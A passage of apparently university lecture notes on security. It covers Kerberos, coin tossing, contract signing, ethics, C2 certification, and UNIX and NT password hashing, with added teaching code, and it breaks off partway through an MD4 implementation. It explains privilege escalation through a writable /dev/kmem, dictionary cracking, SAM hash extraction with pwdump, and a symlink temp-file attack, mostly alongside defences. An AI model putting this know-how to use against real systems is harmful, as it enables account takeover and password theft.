An authenticator Ac,s contains the client's name, a timestamp and an optional extra session key. This is encrypted with the session key shared between the client and the server.
Kerberos protocol
A key Kx,y is a session key shared by both x and y.
When we encrypt a message M using the key Kx,y we write it as {M}Kx,y.
Kerberos protocol
Alice wants a session key for communication with Bob:
• Alice sends a message to Ted (the KDC) containing her identity, Ted's TGS identity, and a one-time value (n): a, tgs, n.
• Ted responds with a key encrypted with Alice's secret key (which Ted knows), and a ticket encrypted with the TGS secret key: {Ka,tgs, n}Ka {Ta,tgs}Ktgs. Alice now has ticket and session key: {Ta,tgs}Ktgs, Ka,tgs.
• Alice can prove her identity to the TGS, as she has session key Ka,tgs, and Ticket Granting Ticket: {Ta,tgs}Ktgs.
Kerberos protocol
Later, Alice can ask the TGS for a specific service ticket:
• When Alice wants a ticket for a specific service (say with Bob), she sends an authenticator along with the Ticket Granting Ticket to the TGS: {Aa,tgs}Ka,tgs {Ta,tgs}Ktgs, b, n.
• The TGS responds with a suitable key and a ticket: {Ka,b, n}Ka,tgs {Ta,b}Kb.
• Alice can now use an authenticator and ticket directly with Bob: {Aa,b}Ka,b {Ta,b}Kb.
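The exchange on the preceding slides, as an added Python simulation (not code from the course notes or from any Kerberos implementation). The {M}K notation is realised by a toy encrypt-then-MAC construction built from SHA-256 and HMAC, standing in for the DES that Kerberos actually uses (an assumption); LIFETIME, the principal names, the password "correct horse" and the time value are constructed. Besides the happy path it implements the checks Bob must make on a ticket and authenticator (names match, timestamps fresh, authenticator not seen before), so that a replayed authenticator or a ticket not sealed under Bob's key is refused.

```python
import hashlib, hmac, json, os

LIFETIME = 300   # seconds a ticket or authenticator is accepted for (constructed value)

# Toy authenticated encryption standing in for the DES behind the slides' {M}K (assumption).
def _keystream(key, nonce, n):
    parts = (hashlib.sha256(key + nonce + i.to_bytes(4, "big")).digest() for i in range((n + 31) // 32))
    return b"".join(parts)[:n]

def seal(key, obj):
    """{obj}key: readable only with key, and any alteration is caught by the MAC."""
    pt, nonce = json.dumps(obj).encode(), os.urandom(8)
    ct = bytes(a ^ b for a, b in zip(pt, _keystream(key, nonce, len(pt))))
    return nonce + ct + hmac.new(key, nonce + ct, hashlib.sha256).digest()

def unseal(key, blob):
    nonce, ct, tag = blob[:8], blob[8:-32], blob[-32:]
    if not hmac.compare_digest(tag, hmac.new(key, nonce + ct, hashlib.sha256).digest()):
        raise ValueError("wrong key or tampered message")
    return json.loads(bytes(a ^ b for a, b in zip(ct, _keystream(key, nonce, len(ct)))))

def password_key(password, salt):
    # String-to-key: a principal's long-term key is derived from its password and a salt.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), 10_000)

def ticket(client, server, key, now):
    return {"client": client, "server": server, "issued": now, "key": key.hex()}

def check(auth, tkt, me, now):
    """What every party that accepts a ticket must verify before trusting it."""
    if tkt["server"] != me or auth["client"] != tkt["client"]:
        raise ValueError("ticket/authenticator name mismatch")
    if now - tkt["issued"] > LIFETIME or abs(now - auth["ts"]) > LIFETIME:
        raise ValueError("ticket or authenticator expired")

class KDC:
    """Ted: authentication service (messages 1-2) and ticket-granting service (messages 3-4)."""
    def __init__(self, keys):
        self.keys = keys          # principal name -> long-term key; "tgs" is the TGS's own key

    def as_exchange(self, client, n, now):
        k = os.urandom(32)        # session key K_a,tgs
        return (seal(self.keys[client], {"key": k.hex(), "n": n}),            # {K_a,tgs, n}K_a
                seal(self.keys["tgs"], ticket(client, "tgs", k, now)))         # {T_a,tgs}K_tgs

    def tgs_exchange(self, auth_blob, tgt_blob, server, n, now):
        tgt = unseal(self.keys["tgs"], tgt_blob)
        k_tgs = bytes.fromhex(tgt["key"])
        check(unseal(k_tgs, auth_blob), tgt, "tgs", now)
        k = os.urandom(32)        # session key K_a,b
        return (seal(k_tgs, {"key": k.hex(), "n": n}),                         # {K_a,b, n}K_a,tgs
                seal(self.keys[server], ticket(tgt["client"], server, k, now)))  # {T_a,b}K_b

class Server:
    """Bob: accepts message 5 and ends up sharing K_a,b with the client."""
    def __init__(self, name, key):
        self.name, self.key, self.seen = name, key, set()

    def ap_exchange(self, auth_blob, ticket_blob, now):
        t = unseal(self.key, ticket_blob)      # only Bob's key opens T_a,b: the client cannot forge it
        k = bytes.fromhex(t["key"])
        a = unseal(k, auth_blob)               # opening A_a,b with the ticket's key proves knowledge of K_a,b
        check(a, t, self.name, now)
        if (a["client"], a["ts"]) in self.seen:
            raise ValueError("replayed authenticator")
        self.seen.add((a["client"], a["ts"]))  # replay cache
        return t["client"], k

def client_session(kdc, server, client, password, now):
    """Alice's side of messages 1-5. Returns who the server thinks she is, whether both ends hold
    the same K_a,b, and the (authenticator, ticket) pair she sent, so a replay can be tried later."""
    k_a, n1, n2 = password_key(password, client), os.urandom(4).hex(), os.urandom(4).hex()
    m2, tgt = kdc.as_exchange(client, n1, now)                                   # (1), (2)
    r = unseal(k_a, m2)
    assert r["n"] == n1, "reply does not match our nonce"
    k_tgs = bytes.fromhex(r["key"])
    m4, tkt = kdc.tgs_exchange(seal(k_tgs, {"client": client, "ts": now}), tgt, server.name, n2, now)  # (3), (4)
    r = unseal(k_tgs, m4)
    assert r["n"] == n2, "reply does not match our nonce"
    k_b = bytes.fromhex(r["key"])
    auth_b = seal(k_b, {"client": client, "ts": now})                           # A_a,b
    who, k_srv = server.ap_exchange(auth_b, tkt, now)                           # (5)
    return who, k_srv == k_b, (auth_b, tkt)

def rejected(fn, *args):
    """True if the exchange is refused with ValueError (replay, forgery, expiry)."""
    try:
        fn(*args)
    except ValueError:
        return True
    return False

def demo(now=1_000_000):
    """Constructed realm: Alice's key comes from her password; the TGS and Bob have random keys."""
    keys = {"alice": password_key("correct horse", "alice"), "tgs": os.urandom(32), "bob": os.urandom(32)}
    kdc, bob = KDC(keys), Server("bob", keys["bob"])
    return kdc, bob, client_session(kdc, bob, "alice", "correct horse", now)
```

demo() returns the KDC, the server and Alice's result. Calling bob.ap_exchange a second time with the same authenticator is refused by the replay cache, and a ticket sealed under any key but Bob's fails the MAC check before its contents are ever read; real Kerberos also checks the client's network address in the ticket and keeps clocks in step, which this simulation replaces with an explicit now value.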
Weaknesses
Host security: Kerberos makes no provisions for host security; it assumes that it is running on trusted hosts with an untrusted network.
KDC compromises: Kerberos uses a principal's password (encryption key) as the fundamental proof of identity, so the KDC's database of keys is a single point of compromise; and since reply (2) above is encrypted under a password-derived key, anyone who asks for a ticket obtains material against which a weak password can be guessed offline.
Salt: This is an additional input to the one-way hash algorithm that turns a password into a key, so that the same password at two principals gives two different keys and a precomputed dictionary cannot be reused.
Voting protocols
A voting protocol is one in which
• independent systems vote in a kind of election, and
• afterwards we can check that the vote was correct.
• Each voter is only allowed a single vote, and
• the system should be corruption-proof.
Voting protocols
Example with Alice, Bob and Charles (!), who vote and then encrypt and sign a series of messages using public-key encryption. For example, if Alice votes vA, then she will broadcast to all other voters the message
RA(RB(RC(EA(EB(EC(vA))))))
where RA is a random encoding function which adds a random string to a message before encrypting it with A's public key, and EA is public key encryption with A's public key.
Voting protocols
Each voter then signs the message and decrypts one level of the encryption.
At the end of the protocol, each voter has a complete signed audit trail and is assured of the validity of the vote.
Tossing a coin
Alice and Bob want to toss a coin.
Alice calculates two primes p, q, calculates N = pq, and sends N to Bob. N = 35 = 5 * 7
If Bob can factorize the number, then Bob wins the coin toss.
Bob selects a random x, and sends x^2 mod N = y to Alice. y = 31^2 mod 35 = 16
Tossing a coin
Alice calculates the four square roots of 16:
• 4^2 mod 35 = 16
• 31^2 mod 35 = 16
• 24^2 mod 35 = 16
• 11^2 mod 35 = 16
This is easy for Alice, as she knows the prime factors of N. She then sends one of these back to Bob.
Tossing a coin
If Bob receives x or −x (here x = 31 and −x mod 35 = 4), then he learns nothing, but
if Bob receives either of the other values, he can add this to x, and then find the GCD of the result with N:
GCD(24 + 31, 35) = GCD(55, 35) = 5
Alice is unable to tell whether she has divulged the factor, since y = x^2 mod N is the same for all four roots.
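The protocol of the last three slides, as an added Python example (not from the course notes), carried a little further than the text: it works for any two distinct odd primes, not only 5 and 7, and it adds the check Bob should make, that Alice's reply really is a square root of y. Bob's x = 31 and the primes 5 and 7 are the slide's values; everything else is constructed.

```python
import math
import random


def modular_square_roots(y, p, q):
    """Alice's step: all four square roots of y mod N = p*q, which needs the factors p and q.
    Roots mod each prime are found by brute force (fine for toy primes; real sizes use
    Tonelli-Shanks or, for p = 3 mod 4, y^((p+1)/4)), then combined with the CRT."""
    n = p * q
    rp = [r for r in range(p) if r * r % p == y % p]
    rq = [r for r in range(q) if r * r % q == y % q]
    roots = set()
    for a in rp:
        for b in rq:                                   # x = a (mod p) and x = b (mod q)
            roots.add((a * q * pow(q, -1, p) + b * p * pow(p, -1, q)) % n)
    return sorted(roots)


def bob_outcome(x, r, n):
    """Bob's step: he sent y = x^2 mod N and got a root r back. Returns a factor of N if he
    wins, None if he loses, and raises if Alice's reply is not a square root at all."""
    if r * r % n != x * x % n:                        # check the reply before trusting it
        raise ValueError("Alice did not return a square root of y")
    if r in (x % n, (-x) % n):                        # x or -x: Bob learns nothing new
        return None
    f = math.gcd(r + x, n)      # r^2 = x^2 with r != +-x: N divides (r-x)(r+x) but neither factor
    assert 1 < f < n
    return f


def coin_toss(p, q, x, choose=random.choice):
    """One run: returns (Alice's reply, factor Bob learned or None). Alice sees only y, which is
    the same for all four roots, so she cannot tell whether the root she picks is Bob's own x."""
    n = p * q
    assert math.gcd(x, n) == 1, "an x sharing a factor with N would hand Bob a factor for free"
    y = x * x % n                                     # Bob -> Alice
    r = choose(modular_square_roots(y, p, q))         # Alice -> Bob
    return r, bob_outcome(x, r, n)


def win_count(p, q, x):
    """Over Alice's four possible replies, Bob wins with exactly two: the toss is fair."""
    n = p * q
    return sum(bob_outcome(x, r, n) is not None for r in modular_square_roots(x * x % n, p, q))


if __name__ == "__main__":
    print(modular_square_roots(16, 5, 7))     # the slide's N = 35, y = 16: [4, 11, 24, 31]
    print(coin_toss(5, 7, 31))
```

modular_square_roots is Alice's side and needs p and q; bob_outcome is Bob's and needs only N. win_count enumerates Alice's four possible replies and finds that exactly two hand Bob a factor, which is the fairness argument: because y carries no information about which root Bob started from, Alice's pick is a genuine 50/50 whether she means it to be or not.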
Oblivious transfer
In an oblivious transfer, randomness is used to convince participants of the fairness of some transaction.
In a coin-tossing example, Alice knows the prime factors of a large number, and if Bob can factorize the number, then Bob wins a coin toss.
A protocol allows Alice to either divulge one of the prime factors to Bob, or not, with equal probability.
Alice is unable to tell if she has divulged the factor, and so the coin toss is fair.
Contract signing
Signing contracts can be difficult.
If one party signs the contract, the other may not. We have one party bound by the contract, and the other not.
In addition, both may sign, and then one may say "I didn't sign any contract!" afterwards.
Contract signing
Oblivious transfer is used for contract-signing where
• Up to a certain point neither party is bound
• After that point both parties are bound
• Either party can prove that the other party signed
Alice and Bob exchange signed messages, agreeing to be bound by a contract with ever-increasing probability.
Contract signing
In the event of early termination of the contract, either party can take the messages they have to an adjudicator, who chooses a random probability value (42%, say) before looking at the messages.
If both messages are over 42% then both parties are bound.
If less, then both parties are free.
Chapter 9
Lecture 9 - System(in)security
Administration
Results are out - please check.
Assignment 1
hardcopy to tutor or me, email softcopy to me.
Assignment 2 ... better get going.
Last session
• Kerberos
• Voting
• Contract signing
This session
• Ethics and computing
• Organizations and standards
• UNIX passwords
• NT passwords
Stranger danger...
One of my sons was taught stranger-danger at his school. We were asked to quiz him afterwards, so we asked him if he should accept a lift in a car with a stranger. He immediately replied "No way!". We then asked: "What if he offered you sweets?", but he still replied "No way!". Finally we asked: "Why not?", to which he replied "Because you might not get any!"
Ethics
Moral development stages:
Stage 1: Obedience and punishment
...
Stage 6: Individual principles of conscience - an orientation not only toward existing social rules, but also toward the conscience as a directing agent, mutual trust and respect, and principles of moral choice involving logical universalities and consistency. If one acts otherwise, self-condemnation and guilt result.
Ethics
It is my expectation, and requirement, that you are able to maturely evaluate rights and wrongs.
In these sections of the course, I will be outlining systems which demonstrate poor cryptographic techniques, and as a result, can be defeated.
A more cynical view might be that I am teaching hacking
...this is not my intent...
Ethics and computing
No new ethical dilemmas... Perhaps the only significant difference is that the computer crimes are so easy.
Software duplication: = theft.
Using information: = insider trading.
E-mail abuse: = abuse.
Network administrator’s dilemma
Network administrators often come to learn things about their 'clients'.
Without asking the client, they should not make use of that information.
The network administrator's dilemma: how to control bad-guys without trampling over rights.
Professional codes of ethics
Most professional bodies (for example, medical boards) have formal written codes of ethics.
The computer industry has yet to develop a standard code of conduct.
If computer crime continues to rise, codes may be imposed on it.
ACS code of ethics
1. I will serve the interests of my clients and employers, my employees and students, and the community generally, as matters of no less priority than the interests of myself or my colleagues....
Within a general framework of ethical and moral responsibility, codes such as this one can help clarify grey areas of concern.
Insecurity - threats are real
For example:
• Pentagon machines were repeatedly corrupted by unknown intruders during the Gulf war. The intruders appeared to be doing it as part of a contest.
• German hackers demonstrated on TV a method of transferring money into their own accounts using ActiveX controls downloaded to an unsuspecting person's machine.
• Estimates of computer theft in the US range from US$1 to 30 billion per year - most of which goes unreported.
Taxonomy of insecurity?
Each new attack adds new levels to the structure:
• physical insecurity, and
• password insecurity
Some of the security of modern systems is provided through cryptographic techniques (particularly password storage), the subject today.
Non-cryptographic cracking
Misconfiguration: If excessive permissions exist on certain directories and files, these can lead to gaining higher levels of access. For example, on a UNIX system, if /dev/kmem is writable it is possible to rewrite your UID to match root's.
Poor SUID: Sometimes there are scripts (shell or Perl) that perform certain tasks and run as root. If the scripts are writable by you, you can edit them and run them.
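A check for the misconfiguration and poor-SUID cases above, as an added Python example (not from the course notes). The records in SAMPLE are constructed, not taken from a real host; walk() produces the same kind of records from a real directory tree. The device-node rule is limited to kernel memory devices and raw block devices because /dev/null and /dev/tty are world-writable by design.

```python
import os
import stat
from collections import namedtuple

# One record per filesystem object; walk() produces them from a real tree with os.lstat().
Entry = namedtuple("Entry", "path mode uid")
ROOT_UID = 0
KERNEL_MEMORY = {"kmem", "mem", "port"}   # device nodes whose writability means "you are root"


def findings(entries):
    """Flag the misconfigurations the slides describe: writable setuid/setgid programs,
    setuid-root scripts, writable kernel-memory or raw-disk device nodes, and
    world-writable directories that lack the sticky bit."""
    out = []
    for e in entries:
        m = e.mode
        others_w, group_w = bool(m & stat.S_IWOTH), bool(m & stat.S_IWGRP)
        setid = bool(m & (stat.S_ISUID | stat.S_ISGID))
        if stat.S_ISREG(m) and setid and (others_w or group_w):
            out.append((e.path, "setuid/setgid file writable by group or others"))
        elif stat.S_ISREG(m) and (m & stat.S_ISUID) and e.uid == ROOT_UID and e.path.endswith((".sh", ".pl")):
            out.append((e.path, "setuid-root script"))
        elif stat.S_ISCHR(m) and os.path.basename(e.path) in KERNEL_MEMORY and (others_w or group_w):
            out.append((e.path, "kernel memory device writable by group or others"))
        elif stat.S_ISBLK(m) and others_w:
            out.append((e.path, "world-writable raw disk device"))
        elif stat.S_ISDIR(m) and others_w and not (m & stat.S_ISVTX):
            out.append((e.path, "world-writable directory without sticky bit"))
    return out


def walk(top):
    """Entry records for a real directory tree; lstat so that symlinks are not followed."""
    for dirpath, dirnames, filenames in os.walk(top):
        for name in dirnames + filenames:
            p = os.path.join(dirpath, name)
            st = os.lstat(p)
            yield Entry(p, st.st_mode, st.st_uid)


# Constructed sample records (no real host was audited); modes as os.lstat would report them.
SAMPLE = [
    Entry("/dev/kmem", stat.S_IFCHR | 0o660, 0),                                  # group-writable: rewrite your UID
    Entry("/dev/null", stat.S_IFCHR | 0o666, 0),                                  # world-writable by design
    Entry("/dev/sda", stat.S_IFBLK | 0o666, 0),                                   # raw disk open to everyone
    Entry("/usr/bin/passwd", stat.S_IFREG | stat.S_ISUID | 0o755, 0),             # setuid but not writable: fine
    Entry("/usr/local/bin/helper", stat.S_IFREG | stat.S_ISUID | 0o775, 0),       # group can replace the program
    Entry("/usr/local/bin/backup.sh", stat.S_IFREG | stat.S_ISUID | 0o755, 0),    # the "poor SUID" script
    Entry("/tmp", stat.S_IFDIR | stat.S_ISVTX | 0o777, 0),                        # sticky: fine
    Entry("/var/spool/drop", stat.S_IFDIR | 0o777, 0),                            # anyone can replace files here
]


def flagged_paths(entries=SAMPLE):
    return [path for path, _ in findings(entries)]


if __name__ == "__main__":
    import sys
    target = walk(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE
    for path, why in findings(target):
        print(f"{path}: {why}")
```

Run it with a directory as its argument to audit a real tree, or with none to see the constructed records scored. The rules are deliberately simple and a real deployment will need local allow-lists; the point is that every case on the slide is a permission bit that a script can find before an intruder does.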
Non-cryptographic cracking
Buffer overflow: Buffer overflows are typically used to spawn root shells from a (server) process running as root.
Race conditions: A race condition is when a program creates a short opportunity for attack by opening a small window of vulnerability. For example, a program that alters a sensitive file might use a temporary backup copy of the file during its alteration.
Non-cryptographic cracking
Poor temporary files: Many programs create temporary files while they run. If a program runs as root and is not careful about where it puts its temporary files and what permissions these files have, it might be possible to use links to create root-owned files.
Attacks using these methods can be launched locally on the target machine, or often remotely, by exploiting services with loopholes.
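The temporary-file problem above, as an added Python example (not from the course notes), showing the bug and its fix side by side in a private scratch directory: the naive by-name write follows a symlink the attacker planted and overwrites the file it points at, while a create-or-fail open (O_CREAT|O_EXCL|O_NOFOLLOW, mode 0600) refuses. The file names victim and tmpfile and their contents are constructed.

```python
import os
import stat
import tempfile


def vulnerable_create(path, data):
    """The slide's bug: a privileged program writes its temporary file by name. If an attacker
    has already planted a symlink at `path`, the write goes through the link into its target."""
    with open(path, "w") as f:            # "w" follows the symlink and truncates whatever it points at
        f.write(data)


def safe_create(path, data):
    """Create-or-fail: O_EXCL refuses if anything, a symlink included, already has this name;
    O_NOFOLLOW refuses to traverse a symlink; mode 0o600 keeps the file private."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)
    with os.fdopen(fd, "w") as f:
        f.write(data)


def safe_tempfile(directory=None):
    """What to reach for instead of a fixed name: mkstemp picks an unpredictable name and
    opens it exclusively with mode 0o600."""
    fd, path = tempfile.mkstemp(dir=directory)
    os.close(fd)
    return path


def run_demo():
    """Constructed scenario in a private directory: `victim` stands in for a root-owned file,
    `tmpfile` is the name the privileged program will use, and the attacker has put a symlink there.
    Returns (victim clobbered by the naive write, safe write refused, mkstemp file private)."""
    with tempfile.TemporaryDirectory() as d:
        victim, tmp = os.path.join(d, "victim"), os.path.join(d, "tmpfile")
        with open(victim, "w") as f:
            f.write("original contents\n")
        os.symlink(victim, tmp)                       # the attacker's move, before the program runs
        vulnerable_create(tmp, "attacker-controlled\n")
        with open(victim) as f:
            clobbered = f.read() == "attacker-controlled\n"
        try:
            safe_create(tmp, "attacker-controlled\n")
            refused = False
        except OSError:                               # EEXIST: something already has that name
            refused = True
        private = stat.S_IMODE(os.stat(safe_tempfile(d)).st_mode) == 0o600
    return clobbered, refused, private


if __name__ == "__main__":
    print(run_demo())
```

Everything here runs as an ordinary user; the victim file stands in for a root-owned one and the scratch directory for a shared /tmp. The general rule: never open a temporary file by a predictable name, and never follow a link when creating one; tempfile.mkstemp does both for you.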
Protection
Can you protect yourself against attacks?
• Hack/crack yourself:
• Be vigilant:
• Reduce reliance:
• Use more secure systems:
• Update systems:
Finally: "It's not the end of the world!"
This session
• Ethics and computing
• Organizations and standards
• UNIX passwords
• NT passwords
Computer Emergency Response Team
The CERT Coordination Center is the organization that grew from the computer emergency response team formed by the Defense Advanced Research Projects Agency (DARPA) in November 1988 in response to the needs identified during the Internet worm incident. The CERT charter is to work with the Internet community to facilitate its response to computer security events involving Internet hosts, to take proactive steps to raise the community's awareness of computer security issues, and to conduct research targeted at improving the security of existing systems.
CERT
If you are ever involved in a computer security incident it is useful to get in touch with CERT.
They provide incident reports and advisories, and can liaise with other system administration people if the attack on your system comes from outside your organization.
CERT Incident Note IN-99-04
Here is an excerpt from an incident report:
Similar Attacks Using Various RPC Services
Thursday, July 22, 1999
Overview
We have recently received an increasing number of reports that intruders are using similar methods to compromise systems. We have seen intruders exploit three different RPC service vulnerabilities; however, similar artifacts have been found on compromised systems.
...
SIGINT
Signals Intelligence (SIGINT) broke the Japanese military code and learned of plans to invade Midway Island.
In 1943 they began the VENONA project to examine encrypted Soviet diplomatic communications.
The messages were double-encrypted and were extremely difficult to crack.
Almost all of the US KGB messages in 1944 and 1945 were broken between 1947 and 1952.
NSA - National Security Agency
Successor to the US signals-intelligence organizations described above.
The National Security Agency is the USA's cryptologic organization.
It coordinates, directs, and performs highly specialized activities to protect U.S. information systems and produce foreign intelligence information.
NSA - National Security Agency
NSA employs the country’s premier codemakers andcodebreakers.
It is said to be the largest employer of mathematicians inthe United States and perhaps the world.
Rainbow documents
The NSA created various documents describing the criteria for evaluating the security behaviour of machines.
These criteria were published in a series of documents with brightly coloured covers, and hence became known as the Rainbow series (red book, yellow book...).
C2 security
DOD 5200.28-STD - “Department of Defense Trusted Computer System Evaluation Criteria”:
• To provide a standard to manufacturers (for security features related to confidentiality)...
• To provide DoD components with a metric with which to evaluate the degree of trust...
• To provide a basis for specifying security requirements in acquisition specifications.
C2 security example
The TCB [14] shall require users to identify themselves to it before beginning to perform any other actions that the TCB is expected to mediate.
Furthermore, the TCB shall use a protected mechanism (e.g., passwords) to authenticate the user's identity.
[14] Trusted Computing Base.
Microsoft and C2
Windows NT Workstation version 3.5 with U.S. Service Pack 3 was the first Microsoft product to complete C2 testing. It is only certified when using the same hardware and installed software, and the certified configuration does not include any network connection. The NT utility c2config.exe sets up an NT system to pass the C2 tests.
The 1998 attacks on the Pentagon involved theft and modification of data, as well as denial-of-service. The attacked machines were C2-secure Windows NT machines.
UNIX and C2
Many UNIX systems have also got C2 certification, and come configured this way from the manufacturer.
There are numerous examples of hacked UNIX systems found on the Internet. In 1996, a site I managed in New Zealand was the target of a malicious attack by intruders from Australia and Belgium.
Given all this, C2 certification is probably not a good guide as to the security of your system.
This session
• Ethics and computing
• Organizations and standards
• UNIX passwords
• NT passwords
Password security
Morris and Thompson article:
http://citeseer.nj.nec.com/morris79password.html
Computer generated passwords more predictable than user ones...
UNIX password security
UNIX systems are traditionally open systems, given their background in university environments.
As such, the security on them is often minimal.
It is common for UNIX accounts to be made available relatively freely.
For example, at the MIT Media Lab [15] all computers have been password-free until recently.
[15] MIT - home of Kerberos!
UNIX password security
UNIX systems are vulnerable to a wide range of attacks, particularly internal attacks.
All Unix systems have a root account.
This account has a UID and GID of zero, and once root access is obtained on a UNIX system, there is very little that cannot be done.
UNIX accounts
Account passwords are constructed to meet the following requirements:
• Each password has at least six characters.
• Only the first eight characters are significant.
UNIX accounts
There are many other accounts found on Unix systems, not just those for clients:
sysadm - A System V administration account, and
daemon - A daemon process account, and
uucp - The UUCP owner, and
lp - The print spooler owner.
When protecting a UNIX system, we must protect all these accounts - not just root.
UNIX password file
Account information is kept in a file called /etc/passwd.
It normally consists of seven colon-delimited fields, and may look like the following:
hugo:aAbBcJJJx23F55:501:100:Hughs Account:/home/hugo:/bin/tcsh
/etc/passwd fields
hugo: The account or user name.
aAbBcJJJx23F55: A one-way encrypted (hashed) password
501: The UID - unique user number
100: The GID - group number for user.
Hughs Account: Account information.
/home/hugo: The account’s home directory
/bin/tcsh: A program to run when you log in
UNIX passwords
When you log in with your account name and password, the password is encrypted and the resulting hash is compared to the hash stored in the password file.
If they are equal, the system accepts that you've typed in the correct password and grants you access.
UNIX passwords
UNIX uses a DES-like algorithm to calculate the encrypted password.
The password is used as the DES key (eight 7-bit characters make a 56 bit DES key) to encrypt a block of binary zeroes.
The result of this encryption is the hash value.
Note: the password is not encrypted, it is the key used to perform the encryption!
UNIX salt
A strengthening feature of UNIX is that it introduces two random characters into the algorithm (the salt).
This ensures that two equal passwords result in two different hashes.
From viewing the UNIX password file you cannot tell if two persons have the same password.
UNIX salt
To prevent crackers from simply encrypting an entire dictionary and then looking up the hash, the salt was added to the algorithm to create 4096 possible different hashes for a particular password.
This lengthens the cracking time because it becomes a little harder to store an encrypted dictionary online, as the encrypted dictionary now would have to take up 4096 times the disk space.
This does not make password cracking harder, just more time consuming.
Crypt code
Sample crypt code from LINUX uClibc. The code has the following structure:

```c
extern char *md5_crypt(const char *key, const char *salt);
extern char *des_crypt(const char *key, const char *salt);

extern char *crypt(const char *key, const char *salt)
{
    /* Are we supposed to be using the MD5 replacement
       instead of DES... */
    /* A salt beginning "$1$" selects the MD5-based scheme; anything
       else is the traditional two-character DES salt. */
    if (salt[0] == '$' && salt[1] == '1' && salt[2] == '$')
        return md5_crypt(key, salt);
    else
        return des_crypt(key, salt);
}
```
Cracking
It is very time consuming, but given enough time, brute force cracking will get the password.
The hashed passwords are compared with the entry in the /etc/passwd file.
BTW - You cannot try to log in using all the possible passwords, as UNIX systems enforce 10 second timeouts after three consecutive login failures.
Dictionary cracking
Dictionary password cracking is the most popular method for cracking Unix passwords.
The cracking program will take a word list, and one at a time try to crack one or all of the passwords listed in the password file.
Some password crackers will filter and/or mutate:
substitute numbers for certain letters, add prefixes or suffixes, or switch case or order of letters.
Dictionary cracking
A popular cracking utility is called Crack.
Crack can use user-definable rules for word manipulation/mutation to maximize dictionary effectiveness.
Crack merges dictionaries, turns the password files into a sorted list, and generates lists of possible passwords from the merged dictionary or from information gleaned about users from the password file.
/etc/shadow passwords
Once the password hashes are moved to the shadow file, its permissions are changed as follows:
opo 35# ls -l /etc/shadow
-r-------- 1 root sys 3429 Aug 20 14:46 /etc/shadow
opo 36#
These permissions ensure that ordinary users are unable to look at the password hashes, and hence are unable to try dictionary attacks.
This session
• Ethics and computing
• Organizations and standards
• UNIX passwords
• NT passwords
Microsoft password security
Two one-way password hashes are stored on NT systems:
• a LanManager hash, and
• a Windows NT hash.
The LanManager hash supports the older LanManager protocol originally used in Windows and OS/2. In an all-NT environment it is desirable to turn off LanManager passwords, as it is easier to crack. The NT method uses a stronger algorithm and allows mixed-case passwords.
Microsoft password security
The database containing these hashes on an NT system is called the SAM (Security Access Manager).
If you have administrative access [16], the program pwdump can extract the hashes.
[16] Originally, anyone could extract the hashed passwords from the SAM, as Microsoft believed that “if they didn't tell anyone the algorithms they used, no-one could discover what they had done”. Security through obscurity is not a safe strategy, and Jeremy Allison was able to de-obfuscate the SAM entries relatively quickly.
Microsoft salt
Microsoft does not salt during hash generation, so once a potential password has generated a hash it can be checked against all accounts.
The cracking software takes advantage of this.
LanManager encryption
LanManager encryption is created by taking the user's plaintext password, capitalising it, and either truncating to 14 bytes, or padding to 14 bytes with null bytes.
This 14 byte value is used as two 56-bit DES keys to encrypt an eight byte value, forming a 16 byte value which is stored by the server and client.
This value is known as the hashed password.
NT encryption
Windows NT encryption is a higher quality mechanism, consisting of doing an MD4 hash on a Unicode version of the user's password.
This also produces a 16 byte hash value that is non-reversible.
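Added example (not code from the lecture notes): the NT hash computed as this slide describes, MD4 over the UTF-16LE form of the password, with MD4 implemented inline from RFC 1320 so the block needs no crypto library. It also shows the consequence of the earlier "Microsoft salt" slide: with no salt, two accounts with the same password store byte-for-byte the same hash, which `accounts_with_shared_hash()` counts over a constructed list of passwords. ASCII-only passwords, the 127-character limit and the function names are this example's assumptions; the expected values for the empty string and for `password` are the well-known test vectors.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not the lecture's code: NT hash = MD4(UTF-16LE(password)),
   with no salt.  MD4 follows RFC 1320 so no crypto library is needed. */

static uint32_t rotl32(uint32_t x, int s) { return (x << s) | (x >> (32 - s)); }
#define MD4_F(x, y, z) (((x) & (y)) | (~(x) & (z)))
#define MD4_G(x, y, z) (((x) & (y)) | ((x) & (z)) | ((y) & (z)))
#define MD4_H(x, y, z) ((x) ^ (y) ^ (z))

/* One 64-byte compression step: three rounds of sixteen operations. */
static void md4_block(uint32_t st[4], const uint8_t blk[64])
{
    static const int s1[4] = {3, 7, 11, 19}, s2[4] = {3, 5, 9, 13}, s3[4] = {3, 9, 11, 15};
    static const int k2[16] = {0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15};
    static const int k3[16] = {0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15};
    uint32_t X[16], a = st[0], b = st[1], c = st[2], d = st[3], t;
    int i;
    for (i = 0; i < 16; i++)            /* message words are little-endian */
        X[i] = (uint32_t)blk[4 * i] | (uint32_t)blk[4 * i + 1] << 8 |
               (uint32_t)blk[4 * i + 2] << 16 | (uint32_t)blk[4 * i + 3] << 24;
    for (i = 0; i < 16; i++) {          /* round 1 */
        t = rotl32(a + MD4_F(b, c, d) + X[i], s1[i % 4]);
        a = d; d = c; c = b; b = t;
    }
    for (i = 0; i < 16; i++) {          /* round 2 */
        t = rotl32(a + MD4_G(b, c, d) + X[k2[i]] + 0x5A827999u, s2[i % 4]);
        a = d; d = c; c = b; b = t;
    }
    for (i = 0; i < 16; i++) {          /* round 3 */
        t = rotl32(a + MD4_H(b, c, d) + X[k3[i]] + 0x6ED9EBA1u, s3[i % 4]);
        a = d; d = c; c = b; b = t;
    }
    st[0] += a; st[1] += b; st[2] += c; st[3] += d;
}

/* MD4 of a byte string: full blocks, then 0x80, zero padding and the
   64-bit little-endian bit length, finishing with one or two blocks. */
static void md4(const uint8_t *msg, size_t len, uint8_t out[16])
{
    uint32_t st[4] = {0x67452301u, 0xefcdab89u, 0x98badcfeu, 0x10325476u};
    uint8_t tail[128];
    size_t i, rem = len % 64, lenpos;
    uint64_t bits = (uint64_t)len * 8;

    for (i = 0; i + 64 <= len; i += 64) md4_block(st, msg + i);
    memcpy(tail, msg + i, rem);
    tail[rem] = 0x80;
    lenpos = (rem < 56) ? 56 : 120;
    memset(tail + rem + 1, 0, lenpos - rem - 1);
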